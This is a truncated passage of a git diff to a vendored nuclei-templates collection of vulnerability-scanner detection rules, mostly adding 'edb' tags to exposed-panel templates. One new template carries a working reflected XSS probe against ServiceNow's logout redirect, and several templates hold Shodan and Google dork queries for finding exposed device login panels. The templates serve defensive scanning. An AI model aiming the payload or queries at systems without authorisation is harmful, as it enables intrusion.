https://nvd.nist.gov/vuln/detail/CVE-2022-37153 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-37153 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.html:"Artica" + verified: "true" tags: cve,cve2022,xss,artica requests: diff --git a/config/nuclei-templates/cves/2022/CVE-2022-38463.yaml b/config/nuclei-templates/cves/2022/CVE-2022-38463.yaml new file mode 100644 index 000000000..61db52775 --- /dev/null +++ b/config/nuclei-templates/cves/2022/CVE-2022-38463.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-38463 + +info: + name: ServiceNow - Cross Site Scripting + author: amanrawat + severity: medium + description: | + There exists a reflected XSS within the logout functionality of ServiceNow. This enables an unauthenticated remote attacker to execute arbitrary JavaScript. + reference: + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793 + - https://nvd.nist.gov/vuln/detail/CVE-2022-38463 + classification: + cve-id: CVE-2022-38463 + metadata: + verified: true + shodan-query: http.title:"ServiceNow" + tags: cve,cve2022,servicenow,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "top.location.href = 'javascript:alert(document.domain)';" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/config/nuclei-templates/default-logins/UCMDB/ucmdb-default-login.yaml b/config/nuclei-templates/default-logins/UCMDB/ucmdb-default-login.yaml index 7f92b3251..237c8dd9a 100644 --- a/config/nuclei-templates/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/config/nuclei-templates/default-logins/UCMDB/ucmdb-default-login.yaml @@ -10,7 +10,7 @@ info: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: cwe-id: CWE-798 - tags: ucmdb,default-login + tags: ucmdb,default-login,packetstorm requests: - raw: diff --git a/config/nuclei-templates/default-logins/cobbler/cobbler-default-login.yaml b/config/nuclei-templates/default-logins/cobbler/cobbler-default-login.yaml index 2cfe8ba15..aac1ea56c 100644 --- a/config/nuclei-templates/default-logins/cobbler/cobbler-default-login.yaml +++ b/config/nuclei-templates/default-logins/cobbler/cobbler-default-login.yaml @@ -11,7 +11,7 @@ info: - /~https://github.com/cobbler/cobbler/issues/2909 classification: cwe-id: CWE-798 - tags: cobbler,default-login,api + tags: cobbler,default-login,api,seclists requests: - raw: diff --git a/config/nuclei-templates/default-logins/weblogic/weblogic-weak-login.yaml b/config/nuclei-templates/default-logins/weblogic/weblogic-weak-login.yaml index 558792b84..942e5a635 100644 --- a/config/nuclei-templates/default-logins/weblogic/weblogic-weak-login.yaml +++ b/config/nuclei-templates/default-logins/weblogic/weblogic-weak-login.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,weblogic + tags: default-login,weblogic,vulhub requests: - raw: diff --git a/config/nuclei-templates/exposed-panels/3g-wireless-gateway.yaml b/config/nuclei-templates/exposed-panels/3g-wireless-gateway.yaml index d8675d9ba..234b7e4da 100644 --- a/config/nuclei-templates/exposed-panels/3g-wireless-gateway.yaml +++ b/config/nuclei-templates/exposed-panels/3g-wireless-gateway.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7050 classification: cwe-id: CWE-200 - tags: panel,router + tags: panel,router,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/adobe/adobe-component-login.yaml b/config/nuclei-templates/exposed-panels/adobe/adobe-component-login.yaml index 1d46e9411..1ad431f88 100644 --- a/config/nuclei-templates/exposed-panels/adobe/adobe-component-login.yaml +++ b/config/nuclei-templates/exposed-panels/adobe/adobe-component-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion + tags: panel,adobe,coldfusion,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/advance-setup.yaml b/config/nuclei-templates/exposed-panels/advance-setup.yaml index bbee2bbcf..6a9647f0a 100644 --- a/config/nuclei-templates/exposed-panels/advance-setup.yaml +++ b/config/nuclei-templates/exposed-panels/advance-setup.yaml @@ -10,7 +10,7 @@ info: - https://www.actiontec.com/dsl/ classification: cwe-id: CWE-200 - tags: panel,setup + tags: panel,setup,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/amcrest-login.yaml b/config/nuclei-templates/exposed-panels/amcrest-login.yaml index 1c2714211..4fad3d990 100644 --- a/config/nuclei-templates/exposed-panels/amcrest-login.yaml +++ b/config/nuclei-templates/exposed-panels/amcrest-login.yaml @@ -12,7 +12,7 @@ info: metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest + tags: panel,camera,amcrest,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/atvise-login.yaml b/config/nuclei-templates/exposed-panels/atvise-login.yaml index bc58bf171..0b775e3fe 100644 --- a/config/nuclei-templates/exposed-panels/atvise-login.yaml +++ b/config/nuclei-templates/exposed-panels/atvise-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: google-dork: intitle:"atvise - next generation" - tags: panel,atvise + tags: panel,atvise,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/avatier-password-management.yaml b/config/nuclei-templates/exposed-panels/avatier-password-management.yaml index 49cd4c37a..5f4d310a3 100644 --- a/config/nuclei-templates/exposed-panels/avatier-password-management.yaml +++ b/config/nuclei-templates/exposed-panels/avatier-password-management.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims + tags: edb,panel,avatier,aims requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/blue-iris-login.yaml b/config/nuclei-templates/exposed-panels/blue-iris-login.yaml index 783f3c052..1b77942ef 100644 --- a/config/nuclei-templates/exposed-panels/blue-iris-login.yaml +++ b/config/nuclei-templates/exposed-panels/blue-iris-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris + tags: panel,blueiris,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/cisco/cisco-finesse-login.yaml b/config/nuclei-templates/exposed-panels/cisco/cisco-finesse-login.yaml index ad8938564..53eec5a45 100644 --- a/config/nuclei-templates/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/config/nuclei-templates/exposed-panels/cisco/cisco-finesse-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco + tags: panel,cisco,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/cisco/cisco-integrated-login.yaml b/config/nuclei-templates/exposed-panels/cisco/cisco-integrated-login.yaml index 5f716a001..ea59a7b5e 100644 --- a/config/nuclei-templates/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/config/nuclei-templates/exposed-panels/cisco/cisco-integrated-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/3859 - tags: panel,cisco + tags: panel,cisco,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/cisco/cisco-meraki-exposure.yaml b/config/nuclei-templates/exposed-panels/cisco/cisco-meraki-exposure.yaml index d14835d3a..2bd480492 100644 --- a/config/nuclei-templates/exposed-panels/cisco/cisco-meraki-exposure.yaml +++ b/config/nuclei-templates/exposed-panels/cisco/cisco-meraki-exposure.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco,meraki,disclosure + tags: panel,cisco,meraki,disclosure,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/cloudphysician-radar.yaml b/config/nuclei-templates/exposed-panels/cloudphysician-radar.yaml index 10cb2fb9a..14fbe91dc 100644 --- a/config/nuclei-templates/exposed-panels/cloudphysician-radar.yaml +++ b/config/nuclei-templates/exposed-panels/cloudphysician-radar.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7466 metadata: shodan-query: http.title:"Cloudphysician RADAR" - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/crush-ftp-login.yaml b/config/nuclei-templates/exposed-panels/crush-ftp-login.yaml index e2bca4e13..4d7242ed8 100644 --- a/config/nuclei-templates/exposed-panels/crush-ftp-login.yaml +++ b/config/nuclei-templates/exposed-panels/crush-ftp-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6591 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/d-link-wireless.yaml b/config/nuclei-templates/exposed-panels/d-link-wireless.yaml index 7ae336b0d..b98de3ff9 100644 --- a/config/nuclei-templates/exposed-panels/d-link-wireless.yaml +++ b/config/nuclei-templates/exposed-panels/d-link-wireless.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6784 - tags: panel,dlink,router + tags: dlink,router,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/dericam-login.yaml b/config/nuclei-templates/exposed-panels/dericam-login.yaml index 517078915..42e8a962e 100644 --- a/config/nuclei-templates/exposed-panels/dericam-login.yaml +++ b/config/nuclei-templates/exposed-panels/dericam-login.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7354 metadata: shodan-query: http.title:"Dericam" - tags: panel,dericam + tags: panel,dericam,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/epson-access-detect.yaml b/config/nuclei-templates/exposed-panels/epson-access-detect.yaml index a6a93882f..2306c2dc1 100644 --- a/config/nuclei-templates/exposed-panels/epson-access-detect.yaml +++ b/config/nuclei-templates/exposed-panels/epson-access-detect.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: iot,printer,panel,unauth,epson + tags: iot,printer,panel,unauth,epson,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/epson-web-control-detect.yaml b/config/nuclei-templates/exposed-panels/epson-web-control-detect.yaml index bcd2634d8..1626e6156 100644 --- a/config/nuclei-templates/exposed-panels/epson-web-control-detect.yaml +++ b/config/nuclei-templates/exposed-panels/epson-web-control-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/6873 classification: cwe-id: CWE-200 - tags: iot,printer,panel,unauth,epson + tags: panel,unauth,epson,edb,iot,printer requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/fiori-launchpad.yaml b/config/nuclei-templates/exposed-panels/fiori-launchpad.yaml index dec386770..366139d81 100644 --- a/config/nuclei-templates/exposed-panels/fiori-launchpad.yaml +++ b/config/nuclei-templates/exposed-panels/fiori-launchpad.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true google-dork: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com - tags: panel,sap,fiori + tags: sap,fiori,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/fiorilaunchpad-logon.yaml b/config/nuclei-templates/exposed-panels/fiorilaunchpad-logon.yaml index b382b5bfb..6d2687324 100644 --- a/config/nuclei-templates/exposed-panels/fiorilaunchpad-logon.yaml +++ b/config/nuclei-templates/exposed-panels/fiorilaunchpad-logon.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6793 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/gargoyle-router.yaml b/config/nuclei-templates/exposed-panels/gargoyle-router.yaml index 93e53dcf1..0187b5b30 100644 --- a/config/nuclei-templates/exposed-panels/gargoyle-router.yaml +++ b/config/nuclei-templates/exposed-panels/gargoyle-router.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: title:"Gargoyle Router Management Utility" - tags: panel,iot,gargoyle,router + tags: panel,iot,gargoyle,router,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/glpi-login.yaml b/config/nuclei-templates/exposed-panels/glpi-login.yaml index 8476d6626..cb40221ea 100644 --- a/config/nuclei-templates/exposed-panels/glpi-login.yaml +++ b/config/nuclei-templates/exposed-panels/glpi-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7002 - tags: panel,glpi + tags: panel,glpi,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/honeywell-web-controller.yaml b/config/nuclei-templates/exposed-panels/honeywell-web-controller.yaml index 6ceea803d..634a2b1c1 100644 --- a/config/nuclei-templates/exposed-panels/honeywell-web-controller.yaml +++ b/config/nuclei-templates/exposed-panels/honeywell-web-controller.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7130 - tags: panel + tags: edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/honeywell-xl-web-controller.yaml b/config/nuclei-templates/exposed-panels/honeywell-xl-web-controller.yaml index e50087f86..cabda9f52 100644 --- a/config/nuclei-templates/exposed-panels/honeywell-xl-web-controller.yaml +++ b/config/nuclei-templates/exposed-panels/honeywell-xl-web-controller.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-dork: title:"Honeywell XL Web Controller" - tags: panel,honeywell + tags: panel,honeywell,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/ibm/ibm-note-login.yaml b/config/nuclei-templates/exposed-panels/ibm/ibm-note-login.yaml index 176293102..e3beb70bb 100644 --- a/config/nuclei-templates/exposed-panels/ibm/ibm-note-login.yaml +++ b/config/nuclei-templates/exposed-panels/ibm/ibm-note-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7122 - tags: panel,ibm + tags: ibm,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/intelbras-login.yaml b/config/nuclei-templates/exposed-panels/intelbras-login.yaml index 97b3cc120..5cc3ebab1 100644 --- a/config/nuclei-templates/exposed-panels/intelbras-login.yaml +++ b/config/nuclei-templates/exposed-panels/intelbras-login.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"Intelbras" google-dork: intitle:"Intelbras" "All Rights Reserved" -.com - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/jfrog.yaml b/config/nuclei-templates/exposed-panels/jfrog.yaml index fd0f38b8e..f0944bde7 100644 --- a/config/nuclei-templates/exposed-panels/jfrog.yaml +++ b/config/nuclei-templates/exposed-panels/jfrog.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6797 - tags: panel,jfrog + tags: panel,jfrog,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/jupyter-notebook.yaml b/config/nuclei-templates/exposed-panels/jupyter-notebook.yaml index 23315a5a6..8cc35d62d 100644 --- a/config/nuclei-templates/exposed-panels/jupyter-notebook.yaml +++ b/config/nuclei-templates/exposed-panels/jupyter-notebook.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/ghdb/7970 metadata: shodan-query: http.html:"JupyterHub" - tags: panel,jupyter,notebook,exposure + tags: edb,panel,jupyter,notebook,exposure requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/keenetic-web-login.yaml b/config/nuclei-templates/exposed-panels/keenetic-web-login.yaml index d2ebd699e..31b0e2646 100644 --- a/config/nuclei-templates/exposed-panels/keenetic-web-login.yaml +++ b/config/nuclei-templates/exposed-panels/keenetic-web-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6817 - tags: panel,keenetic + tags: panel,keenetic,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/lacie-panel.yaml b/config/nuclei-templates/exposed-panels/lacie-panel.yaml index bade63e22..24e65f238 100644 --- a/config/nuclei-templates/exposed-panels/lacie-panel.yaml +++ b/config/nuclei-templates/exposed-panels/lacie-panel.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/7118 - tags: panel,lacie,login + tags: panel,lacie,login,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/mini-start-page.yaml b/config/nuclei-templates/exposed-panels/mini-start-page.yaml index d2103bd9c..015fa09fd 100644 --- a/config/nuclei-templates/exposed-panels/mini-start-page.yaml +++ b/config/nuclei-templates/exposed-panels/mini-start-page.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6500 - tags: panel + tags: edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/netscaler-aaa-login.yaml b/config/nuclei-templates/exposed-panels/netscaler-aaa-login.yaml index 45c2d35fa..00eed1e8c 100644 --- a/config/nuclei-templates/exposed-panels/netscaler-aaa-login.yaml +++ b/config/nuclei-templates/exposed-panels/netscaler-aaa-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6898 - tags: panel,netscaler,login + tags: panel,netscaler,login,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/oki-data.yaml b/config/nuclei-templates/exposed-panels/oki-data.yaml index 9b56bac89..9e5b07e05 100644 --- a/config/nuclei-templates/exposed-panels/oki-data.yaml +++ b/config/nuclei-templates/exposed-panels/oki-data.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/5937 - tags: panel,oki + tags: panel,oki,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/olt-web-interface.yaml b/config/nuclei-templates/exposed-panels/olt-web-interface.yaml index 41f093c57..00d15874d 100644 --- a/config/nuclei-templates/exposed-panels/olt-web-interface.yaml +++ b/config/nuclei-templates/exposed-panels/olt-web-interface.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: title:"OLT Web Management Interface" - tags: panel,olt + tags: edb,panel,olt requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/open-game-panel.yaml b/config/nuclei-templates/exposed-panels/open-game-panel.yaml index b865ed26f..3b16acaf7 100644 --- a/config/nuclei-templates/exposed-panels/open-game-panel.yaml +++ b/config/nuclei-templates/exposed-panels/open-game-panel.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7418 metadata: shodan-query: http.title:"Open Game Panel" - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/open-stack-dashboard-login.yaml b/config/nuclei-templates/exposed-panels/open-stack-dashboard-login.yaml index 9b7c6bd67..d67fa9a48 100644 --- a/config/nuclei-templates/exposed-panels/open-stack-dashboard-login.yaml +++ b/config/nuclei-templates/exposed-panels/open-stack-dashboard-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6464 - tags: panel,openstack + tags: panel,openstack,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/opennms-web-console.yaml b/config/nuclei-templates/exposed-panels/opennms-web-console.yaml index 6fb6dbebb..ac308ba02 100644 --- a/config/nuclei-templates/exposed-panels/opennms-web-console.yaml +++ b/config/nuclei-templates/exposed-panels/opennms-web-console.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/5468 - tags: panel,login + tags: panel,login,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/pandora-fms-console.yaml b/config/nuclei-templates/exposed-panels/pandora-fms-console.yaml index 36eb21ecc..6beb1676e 100644 --- a/config/nuclei-templates/exposed-panels/pandora-fms-console.yaml +++ b/config/nuclei-templates/exposed-panels/pandora-fms-console.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6827 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/plesk-obsidian.yaml b/config/nuclei-templates/exposed-panels/plesk-obsidian.yaml index 175dcb1e3..c7be3a2d0 100644 --- a/config/nuclei-templates/exposed-panels/plesk-obsidian.yaml +++ b/config/nuclei-templates/exposed-panels/plesk-obsidian.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6951 - tags: panel,plesk + tags: plesk,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/plesk-onyx.yaml b/config/nuclei-templates/exposed-panels/plesk-onyx.yaml index 8d114df67..29e163329 100644 --- a/config/nuclei-templates/exposed-panels/plesk-onyx.yaml +++ b/config/nuclei-templates/exposed-panels/plesk-onyx.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6501 - tags: panel,plesk,login + tags: panel,plesk,login,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/polycom-login.yaml b/config/nuclei-templates/exposed-panels/polycom-login.yaml index 40b49003e..37e6cec13 100644 --- a/config/nuclei-templates/exposed-panels/polycom-login.yaml +++ b/config/nuclei-templates/exposed-panels/polycom-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6863 - tags: panel + tags: edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/powerlogic-ion.yaml b/config/nuclei-templates/exposed-panels/powerlogic-ion.yaml index cf1a67c63..c17663b1c 100644 --- a/config/nuclei-templates/exposed-panels/powerlogic-ion.yaml +++ b/config/nuclei-templates/exposed-panels/powerlogic-ion.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://www.exploit-db.com/ghdb/6810 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/project-insight-login.yaml b/config/nuclei-templates/exposed-panels/project-insight-login.yaml index e2a5c1795..c6f7124ed 100644 --- a/config/nuclei-templates/exposed-panels/project-insight-login.yaml +++ b/config/nuclei-templates/exposed-panels/project-insight-login.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7413 metadata: shodan-query: http.title:"Project Insight - Login" - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/projectsend-login.yaml b/config/nuclei-templates/exposed-panels/projectsend-login.yaml index b2b995c44..c83f2e53c 100644 --- a/config/nuclei-templates/exposed-panels/projectsend-login.yaml +++ b/config/nuclei-templates/exposed-panels/projectsend-login.yaml @@ -9,7 +9,7 @@ info: - /~https://github.com/projectsend/projectsend metadata: google-dork: intext:Provided by ProjectSend - tags: panel,projectsend + tags: panel,projectsend,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/radius-manager.yaml b/config/nuclei-templates/exposed-panels/radius-manager.yaml index ec613b8f7..f95a40fee 100644 --- a/config/nuclei-templates/exposed-panels/radius-manager.yaml +++ b/config/nuclei-templates/exposed-panels/radius-manager.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6790 - tags: panel,radius + tags: panel,radius,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/remote-ui-login.yaml b/config/nuclei-templates/exposed-panels/remote-ui-login.yaml index 1ccdcc2d7..5b0dbd717 100644 --- a/config/nuclei-templates/exposed-panels/remote-ui-login.yaml +++ b/config/nuclei-templates/exposed-panels/remote-ui-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6815 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/saferoads-vms-login.yaml b/config/nuclei-templates/exposed-panels/saferoads-vms-login.yaml index ae25e07df..5520f4ff0 100644 --- a/config/nuclei-templates/exposed-panels/saferoads-vms-login.yaml +++ b/config/nuclei-templates/exposed-panels/saferoads-vms-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6941 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/sauter-login.yaml b/config/nuclei-templates/exposed-panels/sauter-login.yaml index 4cc10ea8f..c89313500 100644 --- a/config/nuclei-templates/exposed-panels/sauter-login.yaml +++ b/config/nuclei-templates/exposed-panels/sauter-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6883 - tags: panel,sauter + tags: panel,sauter,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/server-backup-login.yaml b/config/nuclei-templates/exposed-panels/server-backup-login.yaml index 5223f6534..c5a9daa8a 100644 --- a/config/nuclei-templates/exposed-panels/server-backup-login.yaml +++ b/config/nuclei-templates/exposed-panels/server-backup-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6949 - tags: paneil,idera + tags: paneil,idera,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/sharecenter-login.yaml b/config/nuclei-templates/exposed-panels/sharecenter-login.yaml index d17ee4682..7409be829 100644 --- a/config/nuclei-templates/exposed-panels/sharecenter-login.yaml +++ b/config/nuclei-templates/exposed-panels/sharecenter-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6892 - tags: panel,login + tags: edb,panel,login requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/sitefinity-login.yaml b/config/nuclei-templates/exposed-panels/sitefinity-login.yaml index e660eea62..3211bf780 100644 --- a/config/nuclei-templates/exposed-panels/sitefinity-login.yaml +++ b/config/nuclei-templates/exposed-panels/sitefinity-login.yaml @@ -7,7 +7,7 @@ info: description: This template identifies the Sitefinity login page. reference: - https://www.exploit-db.com/ghdb/6722 - tags: panel,sitefinity + tags: sitefinity,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/siteomat-login.yaml b/config/nuclei-templates/exposed-panels/siteomat-login.yaml index 29e261d1d..d39849d73 100644 --- a/config/nuclei-templates/exposed-panels/siteomat-login.yaml +++ b/config/nuclei-templates/exposed-panels/siteomat-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6624 - tags: panel,siteomat,login + tags: siteomat,login,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/sphider-login.yaml b/config/nuclei-templates/exposed-panels/sphider-login.yaml index b80ae3bab..127ddc05a 100644 --- a/config/nuclei-templates/exposed-panels/sphider-login.yaml +++ b/config/nuclei-templates/exposed-panels/sphider-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6641 - tags: panel + tags: edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/squirrelmail-login.yaml b/config/nuclei-templates/exposed-panels/squirrelmail-login.yaml index 8af923502..0433cd0a0 100644 --- a/config/nuclei-templates/exposed-panels/squirrelmail-login.yaml +++ b/config/nuclei-templates/exposed-panels/squirrelmail-login.yaml @@ -8,7 +8,7 @@ info: - https://www.exploit-db.com/ghdb/7407 metadata: shodan-query: title:"SquirrelMail" - tags: panel,squirrelmail + tags: squirrelmail,edb,panel requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/syncthru-web-service.yaml b/config/nuclei-templates/exposed-panels/syncthru-web-service.yaml index ffb99db9e..80eaca436 100644 --- a/config/nuclei-templates/exposed-panels/syncthru-web-service.yaml +++ b/config/nuclei-templates/exposed-panels/syncthru-web-service.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: title:"SyncThru Web Service" - tags: panel,syncthru,printer + tags: edb,panel,syncthru,printer requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/teltonika-login.yaml b/config/nuclei-templates/exposed-panels/teltonika-login.yaml index f18fa0b68..0ef432842 100644 --- a/config/nuclei-templates/exposed-panels/teltonika-login.yaml +++ b/config/nuclei-templates/exposed-panels/teltonika-login.yaml @@ -10,7 +10,7 @@ info: - https://teltonika-iot-group.com/ metadata: google-dork: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" - tags: panel,teltonika + tags: panel,teltonika,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/total-web.yaml b/config/nuclei-templates/exposed-panels/total-web.yaml index aa370ea47..1a619af59 100644 --- a/config/nuclei-templates/exposed-panels/total-web.yaml +++ b/config/nuclei-templates/exposed-panels/total-web.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6811 - tags: panel + tags: panel,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/tuxedo-connected-controller.yaml b/config/nuclei-templates/exposed-panels/tuxedo-connected-controller.yaml index 4b456f942..d1ee05e22 100644 --- a/config/nuclei-templates/exposed-panels/tuxedo-connected-controller.yaml +++ b/config/nuclei-templates/exposed-panels/tuxedo-connected-controller.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6486 - tags: panel,tuxedo + tags: panel,tuxedo,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/vigor-login.yaml b/config/nuclei-templates/exposed-panels/vigor-login.yaml index fa493a90d..3634414a9 100644 --- a/config/nuclei-templates/exposed-panels/vigor-login.yaml +++ b/config/nuclei-templates/exposed-panels/vigor-login.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://www.exploit-db.com/ghdb/6610 - tags: panel,login + tags: panel,login,edb requests: - method: GET diff --git a/config/nuclei-templates/exposed-panels/vmware-horizon-panel.yaml b/config/nuclei-templates/exposed-panels/vmware-horizon-panel.yaml index ffd414cdb..6c2586623 100644 --- a/config/nuclei-templates/exposed-panels/vmware-horizon-panel.yaml 